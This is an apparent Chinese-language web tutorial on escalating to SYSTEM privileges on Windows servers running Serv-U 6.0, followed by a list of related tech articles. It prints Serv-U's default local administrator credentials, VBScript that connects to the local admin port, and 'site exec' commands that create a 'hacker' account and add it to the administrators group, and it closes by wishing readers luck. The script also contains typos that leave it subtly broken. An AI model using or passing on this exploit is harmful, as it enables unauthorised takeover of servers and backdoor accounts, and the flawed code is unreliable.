上一篇:常见电脑死机现象及解决办法 >>
Serv-u6.0提权新招
适用环境:服务器禁用fso,关掉wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了serv-u的管理员的密码。serv-u默认用户名:localadministrator 密码:#@$ak#.k;0@p 下面用mswinsock。winsock建立一个连接,并且以system权限添加超级用户,代码如下:
dim revdata
dim sendata
set sock=createobject("mswinsock.winsock")
sock.protocol=0
sock.connect "127.0.0.1",43958
sendata="localadministrator"& chr(10) &chr(13)
sock.senddata snedata
sendata="#@$ak#.k;0@p" &chr(10) &chr(13)
sock.senddata.sendata
使用这个代码就可以连上ftp了,接下来用sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用"site exec net user hacker hacker /add" "site exec net localgroup administrators hacker /add"
呵呵,就这样系统权限到手了,祝大家好运!
()
下一篇:WebBrowser使用全接触 >>
相关文章:
- · Win XP网络及文件安全技巧总结
- · 删除MSSQL危险存储过程的代码
- · 硬盘分区方案大放送
- · 限制 SQL Server指定主机连接
- · SQL Server 提升权限相关命令及防范
- · Windows中提高内存效能的方法
- · Firefox的32个插件介绍
- · Linux与windows文件互传技巧
- · 配置一款漂亮的Win XP系统
- · 突破局域网对上网用户的一些限制
- · 揭露Windows中各种不老实的服务
- · 巧用TT浏览器解除下载限制
- · 防范间谍软件入侵的三个防护措施
- · 修改Windows组策略让系统更强壮
- · 加快mozilla-firefox的启动速度
- · CPU百科全书:完全指标篇
- · Linux系统中完美装载Windows分区
- · 常见硬件不兼容的典型故障解决方案
- · SQL查询语句精华使用简要
- · 与"入侵者"交手:认识XP下的NetBEUI
- · DIY超频经典教程(基础)
- · CACA基础教程
- · 超级P2P搜索引擎让所有收费网站破产
- · 轻轻松松破解还原卡
- · VPN技术详解
- · 微软ping程序源代码完整版
- · 在xp和2003下察看端口对应的进程
- · 关于BBSxp/LeadBBS的后台上传Webshell的鸡肋防范
- · 某运营商受DDOS攻击的应急响应内部文档
- · 利用FTP,实现Linux与windows文件互传
- · ADSL断流/断线问题集中分析
- · Win XP系统中网桥的配置方法
- · 网络基础:带你彻底认识路由器
- · 如何用FTP自动传送文件
- · 用Java获得IP地址
- · 一组SQLServer身份验证管理子程序
- · JavaScript与Java的区别
- · 按下某组键(HotKey)便执行某程式
